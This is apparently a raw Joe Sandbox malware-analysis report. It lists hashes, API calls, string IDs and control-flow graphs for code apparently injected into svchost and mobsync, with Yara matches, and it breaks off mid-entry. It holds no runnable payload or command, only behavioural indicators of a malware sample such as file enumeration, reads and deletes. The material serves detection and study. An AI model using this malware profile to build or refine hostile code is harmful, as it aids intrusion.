                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction ID: 04b42fad36b6039b66cb56d291645ff32dcfac5944f209c950a4f202eecddb28
                                                                    • Opcode Fuzzy Hash: eadc5b00081f3aadb6cbecddb9363a37769cfbc81df39061fd386689d66f5c40
                                                                    • Instruction Fuzzy Hash: EF41F035700606ABC720DE69CD41B6ABBA5FF84750F180629F855EB340DB30E8528BE9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction ID: f82a028039bac5f867c5f5652d00895fb62e3b3093866cae76172b3a19d50c72
                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                    • Instruction Fuzzy Hash: 8691C470E0021A9BDF24DF69CA81ABEB7B5FF44320F98461AE865E73C0D7349942CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction ID: 807ae5e144d08af22ae12aa8f1ad19beb77c177cd9253d130fb62a99f8eed811
                                                                    • Opcode Fuzzy Hash: acdebb8ea35163df2eeac3271beeb3f80a1e650ea2a114cdc3a458077ae52a89
                                                                    • Instruction Fuzzy Hash: E7813A76D002699BDB31DF54CD54BEABBB8AF08710F0445EAE909B7280D7709E81CFA4
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 036BCFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @$@4rw@4rw
                                                                    • API String ID: 4062629308-2979693914
                                                                    • Opcode ID: 80008630b15025f6f5ca4ce0509ec1ece12d6dc72d456d752687f0c2f4b0879e
                                                                    • Instruction ID: 1734f907ab674a2e86636b25b80b10e9085d242087ad081629f770de34f2bfa0
                                                                    • Opcode Fuzzy Hash: 80008630b15025f6f5ca4ce0509ec1ece12d6dc72d456d752687f0c2f4b0879e
                                                                    • Instruction Fuzzy Hash: AF419C79A00224DFDB21EFA9C980AAEBBB8EF45B04F14406EEA15DF354D734D941CB64

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 12149 9188a0c 12150 9188a29 12149->12150 12151 9188a38 closesocket 12150->12151

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 9188a0c-9188a46 call 916039c call 91895ec closesocket
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocket
                                                                    • String ID:
                                                                    • API String ID: 2781271927-0
                                                                    • Opcode ID: 2bee16b7ae48288ce2e2f7aace2b0738cf5cb9468384aa48a2f37f65ec06809b
                                                                    • Instruction ID: 77afd72c9c3392aae325d7faf41fa2270250422ce27a17fd8886be1e2493f6c2
                                                                    • Opcode Fuzzy Hash: 2bee16b7ae48288ce2e2f7aace2b0738cf5cb9468384aa48a2f37f65ec06809b
                                                                    • Instruction Fuzzy Hash: C7E08C32200204BBD610FA5ACC00DEBBB6CDFC9310B01841AFA08A7201C671B925CBF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #D$)Y$<T$<Y$?'$?A$?Q$D$I\$N}$T^$Vs$X*$X5$]?$^X$b$cR$d9$j$}T$+$5$<$B$R$U$Y$e$e$g$s
                                                                    • API String ID: 0-3969691307
                                                                    • Opcode ID: d2ca22a7440ea7b9261f05e6bbb2a9af59a4c8b489afed5b03ba5b6209312085
                                                                    • Instruction ID: d50c9b35379205bbb40828648d8c4eb7f45158b805d462d0d0affbf63fba5378
                                                                    • Opcode Fuzzy Hash: d2ca22a7440ea7b9261f05e6bbb2a9af59a4c8b489afed5b03ba5b6209312085
                                                                    • Instruction Fuzzy Hash: BF52A1B0E0526ACBEB28CF04C994BEDBBB2BB45308F1080D9D50D6B690D7B55AD9DF44
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d631db1fe2f709c1efda2c22692eed9dcd3aec46ed1c536959378932a721876
                                                                    • Instruction ID: 12aa168e8ebfc7d43ea4c0fd7870c8602970f6f60f7eb5ae66df915796ce8365
                                                                    • Opcode Fuzzy Hash: 8d631db1fe2f709c1efda2c22692eed9dcd3aec46ed1c536959378932a721876
                                                                    • Instruction Fuzzy Hash: 70C02B03F4102C0051200D5D74400F2F324E2C36B1F4032F3CD58B710048A3CC0241DC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_9130000_JGgOTaRBeKg.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e71a009ad75cae11130ec5c60c7a5743d992782276b151aeda36eeaed9c85ca4
                                                                    • Instruction ID: a0a112b559aec51373933cf3f8d59f5c9c7855229de75bba884722114b23c266
                                                                    • Opcode Fuzzy Hash: e71a009ad75cae11130ec5c60c7a5743d992782276b151aeda36eeaed9c85ca4
                                                                    • Instruction Fuzzy Hash: C0B092ADE0A4862A51110CA02C259F7FB6C8583021A0173856AAC37AA00912802225A9

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:1.7%
                                                                    Total number of Nodes:409
                                                                    Total number of Limit Nodes:64

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 741 7fc690-7fc740 call 80b540 * 2 call 7e1410 call 801c90 call 7e1410 call 801c90 call 7e1410 call 801c90 758 7fc7bc-7fc7c4 741->758 759 7fc742-7fc744 741->759 759->758 760 7fc746-7fc74a 759->760 760->758 761 7fc74c-7fc74e 760->761 761->758 762 7fc750-7fc779 call 7fc4e0 FindFirstFileW 761->762 762->758 765 7fc77b-7fc77e 762->765 766 7fc780-7fc787 765->766 767 7fc789-7fc7a0 call 7fc580 766->767 768 7fc7a3-7fc7b3 FindNextFileW 766->768 767->768 768->766 770 7fc7b5-7fc7b9 FindClose 768->770 770->758
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 007FC771
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 007FC7AE
                                                                    • FindClose.KERNELBASE(?), ref: 007FC7B9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: f44c58baf209bd75af3c66e409604e796a454ee48ac920048ae06e738891fe5c
                                                                    • Instruction ID: a5cb816075d082bc2d4f532bcd8f4b2cc8580b3b3c3918e339307838ffc3bec4
                                                                    • Opcode Fuzzy Hash: f44c58baf209bd75af3c66e409604e796a454ee48ac920048ae06e738891fe5c
                                                                    • Instruction Fuzzy Hash: 8231737590034CABDB21EB64CD89FFF777CEB84744F144459B608A72C1EB74AA848BA1
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 008091EB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 926c2385d1fb51b2f42ca6124755c6da1f584dc89bb40cf5ca0adffc091a5ed4
                                                                    • Instruction ID: 05b9bf8fec3bc45833096b65b88458c3ba904e62d9670c768a88741e3cc1d7a1
                                                                    • Opcode Fuzzy Hash: 926c2385d1fb51b2f42ca6124755c6da1f584dc89bb40cf5ca0adffc091a5ed4
                                                                    • Instruction Fuzzy Hash: DE31E2B1A01248AFDB54DF98C881EEEB7F9EF8C304F108109F909A7380D774A941CBA5
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00809343
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: bd1ded572eae35531026b8e909257cfc8b5329edb6fb58b707e491301f0badd0
                                                                    • Instruction ID: a993dc1e0ecee3ee93437e576156ea6134641a056994b1ae6ee8dda65131b9b4
                                                                    • Opcode Fuzzy Hash: bd1ded572eae35531026b8e909257cfc8b5329edb6fb58b707e491301f0badd0
                                                                    • Instruction Fuzzy Hash: 8331E9B5A00248ABDB14DF99C881EDFB7B9EF88314F108119F908A7380D774A951CBA1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: 2a74e573bf73c75d9e2f17c521f70068d114271476f4e5f21f1e9a3e66fb59b5
                                                                    • Instruction ID: d9060c1b1f5349520aeb30684ecfa32aa00519de0dc6ae987edd7eb42ce6a424
                                                                    • Opcode Fuzzy Hash: 2a74e573bf73c75d9e2f17c521f70068d114271476f4e5f21f1e9a3e66fb59b5
                                                                    • Instruction Fuzzy Hash: 3811A071500748BED720EB59CC42FEF77ACEF85714F104509FA08AB281EBB5A941CBA2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction ID: 087e11315aa81d11d05be2bc17b91cb797c9015bf857253f65b7a05275f5abaa
                                                                    • Opcode Fuzzy Hash: be3207122271e7a3f35108bc16ee7d5319e0d387d2d3b83b9a8a4fa6e62be9ee
                                                                    • Instruction Fuzzy Hash: F3E046362006147BC620AA5ACC06FDBB76CEFCA760F818415FA1CA7282C771B90086A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cd1edd392348bdb497dc62b301d26ba7afca08ba7be2bb70a4e6172a9b4ac079
                                                                    • Instruction ID: 6cc7402c83fa1a3dfce3c273a06720ee3e88cee70f875222409c720342f88b8f
                                                                    • Opcode Fuzzy Hash: cd1edd392348bdb497dc62b301d26ba7afca08ba7be2bb70a4e6172a9b4ac079
                                                                    • Instruction Fuzzy Hash: B890023260550402F1107158491870620058BD0205FA6C425A0425568D8799DA5165A2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7458e36a692b002dec64ba9381ef653c4080509ec4f55389c0baee40516db142
                                                                    • Instruction ID: 69741e7ad41814515100595de86ee2b4c58195401a2557be4bf5e590ed8ddf9e
                                                                    • Opcode Fuzzy Hash: 7458e36a692b002dec64ba9381ef653c4080509ec4f55389c0baee40516db142
                                                                    • Instruction Fuzzy Hash: 8490026260150042615071584C0840670059BE13053D6C129A0555560C861CD9559269
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d16d57fc6063a14d57d4ac5aa94eadb4beb7e169e2370389b8f162c4b2fe01c7
                                                                    • Instruction ID: 62b0fe5ec1297cc18016c30fb8ff94198b1bee6e3fa471bf80aa9a75c607c8d0
                                                                    • Opcode Fuzzy Hash: d16d57fc6063a14d57d4ac5aa94eadb4beb7e169e2370389b8f162c4b2fe01c7
                                                                    • Instruction Fuzzy Hash: FD90023260580012B15071584C8854650059BE0305B96C025E0425554C8A18DA565361
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6094be12fcf45b81e0e9da0d4029860fb1397a910b590061ac85e490c087a53e
                                                                    • Instruction ID: 176af6a5adb65d48119ec18f93838fc4d8125f59557f366e23454b3c90e23f54
                                                                    • Opcode Fuzzy Hash: 6094be12fcf45b81e0e9da0d4029860fb1397a910b590061ac85e490c087a53e
                                                                    • Instruction Fuzzy Hash: 7990023220140402F1107598580C64610058BE0305F96D025A5025555EC669D9916131
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3665755eab25b125db30ad82e78b6394cc9b9e55727afacb53fdb572be63b90d
                                                                    • Instruction ID: 3aa5835412fef37e4a2821712cd6fb7a79862fa6cc21f50268d00bf549e112df
                                                                    • Opcode Fuzzy Hash: 3665755eab25b125db30ad82e78b6394cc9b9e55727afacb53fdb572be63b90d
                                                                    • Instruction Fuzzy Hash: 8490023220140842F11071584808B4610058BE0305F96C02AA0125654D8619D9517521
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f8cfe734f982ec6285b14ad86d555473a82b076eab9503149ad8df4e9bd1924a
                                                                    • Instruction ID: 99a93c39940ec088978c8da55f54b1839bee3484f859e54ce8150e273901a837
                                                                    • Opcode Fuzzy Hash: f8cfe734f982ec6285b14ad86d555473a82b076eab9503149ad8df4e9bd1924a
                                                                    • Instruction Fuzzy Hash: 1D90023220148802F1207158880874A10058BD0305F9AC425A4425658D8699D9917121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8b35e884b472d7771c11ce7b325414b3814bbf0c6594df7fff9f5e416df8e326
                                                                    • Instruction ID: 7b9d6b0e1ef65d33b9a92473d51cb298d65719ee24e74323622e63d7fabbb75b
                                                                    • Opcode Fuzzy Hash: 8b35e884b472d7771c11ce7b325414b3814bbf0c6594df7fff9f5e416df8e326
                                                                    • Instruction Fuzzy Hash: 2890023220140413F1217158490870710098BD0245FD6C426A0425558D965ADA52A121
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ee0ba4b8a27651daaa3b4257acb72d5ab3f0788ce9348d7796799653adaa9716
                                                                    • Instruction ID: 3e49b9a75363eb436afb09c3ccb3b8054f9d8da0bd877714d0da31c891c89b83
                                                                    • Opcode Fuzzy Hash: ee0ba4b8a27651daaa3b4257acb72d5ab3f0788ce9348d7796799653adaa9716
                                                                    • Instruction Fuzzy Hash: C8900222242441527555B158480850750069BE02457D6C026A1415950C852AE956D621
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b49e98177f2a0b177dbede074c80d49e5fa9d5522790947edbe9fe853455fbbc
                                                                    • Instruction ID: 0474ffa2c2accb1565630aeb4d1a4947e107aeb47de195cb674e2efdfca15423
                                                                    • Opcode Fuzzy Hash: b49e98177f2a0b177dbede074c80d49e5fa9d5522790947edbe9fe853455fbbc
                                                                    • Instruction Fuzzy Hash: F490022230140003F1507158581C6065005DBE1305F96D025E0415554CD919D9565222
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 95f2d1c6852d374ab1014128373d6c589e28b7fd8c254221eb464384e86b87f8
                                                                    • Instruction ID: 8f252bda14c6e5e9902559ffeccedb9486ced4342de1fd3eb92823ca48d6389a
                                                                    • Opcode Fuzzy Hash: 95f2d1c6852d374ab1014128373d6c589e28b7fd8c254221eb464384e86b87f8
                                                                    • Instruction Fuzzy Hash: E590022A21340002F1907158580C60A10058BD1206FD6D429A0016558CC919D9695321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fde6b773fcc2f91800c0568add60a88e2d0725aa15d6f32efede79a0bf71702c
                                                                    • Instruction ID: e484c8e326dc6cfb36086d88ee4279555ff106329c33f93401093dc33665a473
                                                                    • Opcode Fuzzy Hash: fde6b773fcc2f91800c0568add60a88e2d0725aa15d6f32efede79a0bf71702c
                                                                    • Instruction Fuzzy Hash: 9090026220180403F15075584C0860710058BD0306F96C025A2065555E8A2DDD516135
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 16f9fe33236b80d19bd02d0ae0a608eb519389fefd76b1250d9cc2793d2fb3a9
                                                                    • Instruction ID: 660bede100d3853d2272d295a462512705b0715b0cabfbc41bc03e9e00beb926
                                                                    • Opcode Fuzzy Hash: 16f9fe33236b80d19bd02d0ae0a608eb519389fefd76b1250d9cc2793d2fb3a9
                                                                    • Instruction Fuzzy Hash: C190022260140042615071688C489065005AFE1215796C135A0999550D855DD9655665
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c6f087ee870fc80e043690859fa929f82cb2c2a7ede4b55af53eb03053f4d193
                                                                    • Instruction ID: fbf5bfbbc45ed66f6af7997807eb5d4364c1da422a273f99359938863ed2672a
                                                                    • Opcode Fuzzy Hash: c6f087ee870fc80e043690859fa929f82cb2c2a7ede4b55af53eb03053f4d193
                                                                    • Instruction Fuzzy Hash: 03900222211C0042F21075684C18B0710058BD0307F96C129A0155554CC919D9615521
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
